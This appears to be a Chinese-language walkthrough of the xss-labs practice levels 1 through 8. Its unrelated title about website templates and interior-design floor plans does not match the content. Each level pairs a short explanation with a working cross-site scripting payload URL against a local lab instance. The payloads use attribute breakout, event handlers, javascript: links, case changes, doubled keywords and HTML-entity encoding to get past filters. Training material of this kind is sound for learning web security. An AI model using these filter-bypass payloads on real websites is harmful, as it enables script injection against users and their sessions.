网站模版建设教程室内设计平面图讲解

Level1

输入内容会发现内容出现在<h>标签中，直接访问发现成功

http://127.0.0.1/xss-labs/level1.php?name=test<script>alert(123)</script>#;

Level2

输入内容发现出现在<input> 标签的value属性中，闭合value属性即可

http://127.0.0.1/xss-labs/level2.php?keyword=test"><script>alert(111)</script>;

Level3

这次我们输入内容发现内容出现在<input>的value属性中，尝试用”>闭合，结果无法闭合，而尝试用'闭合，发现可以闭合value属性，由于>被过滤，所以我们使用onclick尝试，点击输入框发现尝试成功

http://127.0.0.1/xss-labs/level3.php?keyword='onclick='alert(1)&submit=搜索
#前一个‘用来闭合value，后一个用来完成onclick='xxx'的语法

Level4

这次我们输入内容发现跟level3一样出现在<input>的value属性中,尝试"闭合value成功，但是尝试>闭合失败，说明被过滤，尝试onclick属性，点击输入框，尝试成功

http://127.0.0.1/xss-labs/level4.php?keyword=try"onclick='alert(1)'&submit=搜索

Level5

这次我们输入内容发现与上一关出现位置相同,测试"闭合value，发现闭合成功，尝试>
闭合，发现也成功，开始尝试<script>发现被改为<scr_ipt>无法完成，再次尝试onclick
发现'被过滤了而且onclick被改为on_click，尝试使用<a>标签将变为超链接，在链接中使用javascript伪代码尝试，点击超链接,发现尝试成功

http://127.0.0.1/xss-labs/level5.php?keyword=find"><a href="javascript:alert(1)">111</a>&submit=搜索

Level6

我们输入后发现与上一关是一样的<script>和<onclick>都被加了下划线无法使用，且可以用">闭合，尝试使用<a>标签，发现href被改为了hr_ef，我们在尝试大小写<sCript>发现成功绕过

http://127.0.0.1/xss-labs/level6.php?keyword=break"><sCript>alert(1)</sCript>&submit=搜索

Level7

这次我们直接尝试">的闭合，<script>、<onclick>、herf，结果发现可以闭合，但是后面三者均被过滤了，我们可以尝试双写绕过<scscriptript>或者<oonnclick hrhrefef=>，发现成功绕过

http://127.0.0.1/xss-labs/level7.php?keyword=move"oonnclick=javascript:alert(1)>&submit=搜索#或者http://127.0.0.1/xss-labs/level7.php?keyword=move"><scrscriptipt>alert(1)</scrscriptipt>&submit=搜索

Level8

我们输入内容发现同样出现在value中，而且也出现在了 超链接中，这里我们尝试">闭合，发现无法闭合，尝试从超链接出发，发现javascript也被修改为javascr_ipt,这里我们可以利用a标签的自动unicode解码属性绕过,我们对javascript：alert(1)进行Unicode编码（模式为HTML）得到javascript:alert(1)，放入文本框中，点击添加友情链接，之后点击友情链接即可绕过

http://127.0.0.1/xss-labs/level8.php?keyword=%26%23106%3B%26%2397%3B%26%23118%3B%26%2397%3B%26%23115%3B%26%2399%3B%26%23114%3B%26%23105%3B%26%23112%3B%26%23116%3B%26%2358%3B%26%2397%3B%26%23108%3B%26%23101%3B%26%23114%3B%26%23116%3B%26%2340%3B%26%2349%3B%26%2341%3B&submit=添加友情链接